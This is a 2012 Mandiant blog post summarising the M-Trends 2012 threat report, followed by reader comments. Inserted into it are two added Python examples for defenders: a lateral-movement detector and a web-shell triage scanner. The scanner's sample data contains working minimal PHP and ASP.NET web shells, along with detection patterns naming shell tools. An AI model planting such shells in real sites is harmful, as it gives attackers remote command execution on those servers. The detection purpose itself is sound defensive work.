M-Unition

M-Trends: The One Threat Report You Need to Read

By Helena Brito on March 6, 2012

Today is a big day. If you’ve followed us for a while you know that once a year we step back and take stock of what we’ve seen on the front lines battling targeted attacks. What is the advanced persistent threat (APT) up to? How are organized crime groups changing their tactics? What can organizations do to respond? Hot off the presses, M-Trends 2012 is full of facts, figures, case studies and recommendations. You can download the full report here. And we’ve got a webinar on March 16th to go over the report in detail.

Two figures jumped out at us while writing M-Trends 2012: 94% and 416. The first is the percentage of victim organizations that learned they were the target of an attack from an external party, such as law enforcement, rather than through their own detection. The second is the median number of days an advanced attacker was present in a victim’s environment before being detected.

All in all, the Mandiant team identified six key trends this year based on the hundreds of advanced threat investigations we have conducted.

  1. Compromised Organizations Are Increasingly Detected During the M&A Cycle: Based on Mandiant’s experience, a record number of targeted intrusions were discovered while the victimized organizations were in the process of integrating into their new parent organizations.
  2. Advanced Attackers Are Targeting Multiple Companies across a Supply Chain: Attackers are targeting companies that collaborate within a supply chain in order to assemble a comprehensive intellectual property portfolio.
  3. Malware Only Tells Half the Story: Only 54% of the compromised machines that Mandiant investigated contained malware, while 100% of the attacks Mandiant investigated used stolen credentials during the intrusion.
  4. Attackers Are Diversifying Their Persistence Mechanisms: During 2011, Mandiant saw advanced attackers diversify their backdoor mechanisms to include passive backdoors such as port listeners and web shells that are more resilient against detection and remediation efforts.
  5. The Use of Publicly Available Tools Is Adding Complexity to Identifying Threat Actors: Over the past year, Mandiant has seen an increase in attack groups using publicly available Remote Access Trojans (RATs), backdoors, and utilities to gain access to victim organizations. Because these tools are shared across groups, their presence alone no longer points to a particular actor.
  6. Financially Motivated Attackers Are Increasingly Persistent: Organized crime groups are adopting persistence mechanisms previously used by nation-state threat actors.
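Trend 3 is the one that changes how a sweep has to be run: an attacker holding valid credentials leaves authentication records, not binaries, on most of the hosts they visit. As an added example (not code from the report or from Mandiant’s tooling), the script below reads constructed Windows logon records in a flattened CSV form, a simplified view of Security event 4624, flags an account that fans out to several hosts via network or RDP logons inside a short window, and then lists the hosts that were reached but on which no malware was found. The field layout, the thresholds, the hostnames and the malware-host set are all assumptions for illustration.

```python
"""Flag stolen-credential lateral movement in Windows logon records.

Added example for the trend above, not code from the M-Trends report. The
records below are constructed: "timestamp,host,account,logon_type,source_ip",
a flattened view of Windows Security event 4624 fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (assumption: one 4624 event per line).
SAMPLE_EVENTS = """\
2011-11-03T02:14:05,FS01,CORP\\svc_backup,3,10.1.4.22
2011-11-03T02:15:11,HR-DB,CORP\\svc_backup,3,10.1.4.22
2011-11-03T02:16:40,ENG-SRV7,CORP\\svc_backup,3,10.1.4.22
2011-11-03T02:17:02,ENG-SRV8,CORP\\svc_backup,10,10.1.4.22
2011-11-03T02:18:30,DC02,CORP\\svc_backup,3,10.1.4.22
2011-11-03T02:19:55,WKS-0412,CORP\\svc_backup,3,10.1.4.22
2011-11-03T09:00:01,WKS-0201,CORP\\jsmith,2,10.1.7.33
2011-11-03T09:05:12,FS01,CORP\\jsmith,3,10.1.7.33
2011-11-03T13:40:00,WKS-0201,CORP\\jsmith,7,10.1.7.33
"""

# Hosts where the (constructed) investigation found malware; every other host
# in a finding was reached with credentials alone.
MALWARE_HOSTS = {"FS01", "DC02"}

# Logon type 3 = network (SMB, WMI, PsExec-style), 10 = RemoteInteractive (RDP).
LATERAL_LOGON_TYPES = {"3", "10"}


def parse_events(text):
    """Parse the flattened records into dicts with a datetime 'time' field."""
    events = []
    for line in text.strip().splitlines():
        ts, host, account, logon_type, src = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "account": account, "logon_type": logon_type, "src": src})
    return events


def find_fanout(events, window=timedelta(hours=1), min_hosts=4):
    """Return one finding per (account, source IP) that reached at least
    min_hosts distinct hosts with lateral logon types inside any window."""
    by_actor = defaultdict(list)
    for e in events:
        if e["logon_type"] in LATERAL_LOGON_TYPES:
            by_actor[(e["account"], e["src"])].append(e)

    findings = []
    for (account, src), evs in by_actor.items():
        evs.sort(key=lambda e: e["time"])
        best = None
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            hosts = {e["host"] for e in burst}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                best = {"account": account, "src": src, "hosts": sorted(hosts),
                        "first": first["time"], "last": burst[-1]["time"]}
        if best is not None:
            findings.append(best)
    return findings


def credential_only_hosts(findings, malware_hosts):
    """Hosts the attacker touched that a malware-centric sweep would never list."""
    touched = set()
    for f in findings:
        touched.update(f["hosts"])
    return sorted(touched - set(malware_hosts))


if __name__ == "__main__":
    found = find_fanout(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f['account']} from {f['src']}: {len(f['hosts'])} hosts "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
    print("reached with credentials only:", credential_only_hosts(found, MALWARE_HOSTS))
```

Run against the sample, the service account that touched six servers in five minutes from one workstation is flagged, while the ordinary user with one file-server logon is not; four of the six hosts would be missed by a sweep that only looks for malware. On a real estate the same logic runs over 4624 events collected centrally, and the window and host thresholds are tuned per account class, since backup and monitoring accounts legitimately fan out and need a baseline rather than a fixed number.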

If you stopped by our booth at RSA you were lucky enough to get an advance copy of M-Trends 2012. For those who missed it, you can now download the full report here. Grady Summers, vice president at Mandiant and one of the principal authors, will be breaking down each trend in depth over the coming weeks, so stay tuned for his future blog posts.
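Trend 4 in the list above describes passive backdoors: a web shell or a port listener waits for the attacker to connect rather than beaconing out, so controls that watch for outbound command-and-control traffic never see them. As an added example (not code from the report), the script below does the host-side check for the web shell half of that trend: a triage scan over constructed file contents that scores common web-shell indicators (eval of request data, decode or inflate layers, OS process launches, long opaque string literals). The sample files, the indicator list, the weights and the threshold are assumptions chosen to show the idea; they are a starting point, not a complete signature set.

```python
"""Triage scan for web-shell indicators in files under a web root.

Added example for the passive-backdoor trend above, not code from the report.
The sample files are constructed; the indicator list and weights are
assumptions, a starting point rather than a complete signature set.
"""
import re

# Constructed sample files: relative path -> content.
SAMPLE_FILES = {
    # Ordinary form handler: reads a request parameter but executes nothing.
    "contact.php": (
        "<?php\n"
        "$name = htmlspecialchars($_POST['name']);\n"
        "mail('sales@example.test', 'Contact form', $name);\n"
    ),
    # One-line shell: runs whatever arrives in a POST parameter.
    "upload/img_0421.php": "<?php @eval($_POST['pw']); ?>",
    # ASP.NET shell: launches cmd.exe with an attacker-supplied argument.
    "aspnet_client/default.aspx": (
        '<%@ Page Language="C#" %>'
        '<% var p = new System.Diagnostics.Process();'
        ' p.StartInfo.FileName = "cmd.exe";'
        ' p.StartInfo.Arguments = "/c " + Request["cmd"];'
        ' p.StartInfo.UseShellExecute = false;'
        ' p.StartInfo.RedirectStandardOutput = true;'
        ' p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>'
    ),
    # Packed shell: the real code is hidden behind decode/inflate layers.
    "includes/cache.php": (
        "<?php eval(gzinflate(base64_decode('" + "H4sIAAAAAAAAA" * 20 + "'))); ?>"
    ),
}

# (regex, weight, label). Each indicator counts once per file.
INDICATORS = [
    (r"\beval\s*\(", 3, "eval of runtime data"),
    (r"\b(?:system|shell_exec|passthru|proc_open|popen)\s*\(", 3, "PHP command execution"),
    (r"Diagnostics\.Process|cmd\.exe|/bin/sh|powershell", 3, "OS process launch"),
    (r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", 2, "decode/inflate layer"),
    (r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", 1, "PHP request parameter read"),
    (r"Request\s*(?:\[|\.(?:Form|QueryString|Item))", 1, "ASP.NET request parameter read"),
]

# A quoted run of 100+ base64-alphabet characters is usually a packed payload.
LONG_OPAQUE_LITERAL = re.compile(r"['\"][A-Za-z0-9+/=]{100,}['\"]")


def score_file(content):
    """Return (score, labels) for one file's content."""
    score, labels = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, content):
            score += weight
            labels.append(label)
    if LONG_OPAQUE_LITERAL.search(content):
        score += 2
        labels.append("long opaque literal")
    return score, labels


def triage(files, threshold=3):
    """Score every file and return those at or above threshold, highest first."""
    flagged = []
    for name, content in files.items():
        score, labels = score_file(content)
        if score >= threshold:
            flagged.append((name, score, labels))
    return sorted(flagged, key=lambda item: -item[1])


if __name__ == "__main__":
    for name, score, labels in triage(SAMPLE_FILES):
        print(f"{score:2d}  {name}: {', '.join(labels)}")
```

The score only triages: the three shells are flagged and the contact form is not, but a flagged file still has to be read, and the web server access log for the first request to that path usually gives the date the shell was planted and the source address that used it. The port-listener half of the trend needs a different check, comparing listening sockets on each host against a known baseline, which this block does not cover.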

Once you’ve had a chance to read the report, I’d love to hear your comments. Please include them below.

Category: The Armory

Comments

    1. By saad on March 12 at 11:13 am

      Thank you for such a great, eye-opening report. It’s packed with invaluable content for incident responders and security managers/upper management alike.

      Unless I’ve missed something, there’s no analysis of the attacker themselves. While you distinguish between the APT and the financially motivated ones, were there any incidents where two or more attacker groups acted/maintained presence?

      For example, in the electronics manufacturer case study on pages 16-17, you mention that the intruder installed malware on less than half of the approx. 100 compromised systems. The reader would then assume there was only one intruder (individual or group). But is there any chance there were several, with the same or different motives?

      I hope you will clarify this point during the March 16 webinar.

      On a side note, Mr. Bejtlich voiced his concern on a few occasions about China’s aggressiveness and role in the IP bleeding of US corporations. But the country of origin (or geodistribution of the attacker groups) is never mentioned, save on page 24 where you speak briefly about Russian organized crime groups.

      Also, I’ve been wishing to see how the October 11 SEC guidance may have influenced IR, during the M&A process for example. But I guess it’s too early to say.

      Thank you again for sharing such an important resource for our community, and I am looking forward to the March 16 webinar.

      Best Regards,
      Saad Kadhi, Hapsis, FRANCE.

    2. By Helena Brito (Author) on March 13 at 4:09 pm

      Thank you for your comments and questions. Richard Bejtlich will address your points in an upcoming stand-alone blog post.

    3. By Helena Brito (Author) on April 2 at 10:09 am

      Richard has written a blog post answering the questions you had: https://blog.mandiant.com/archives/2390
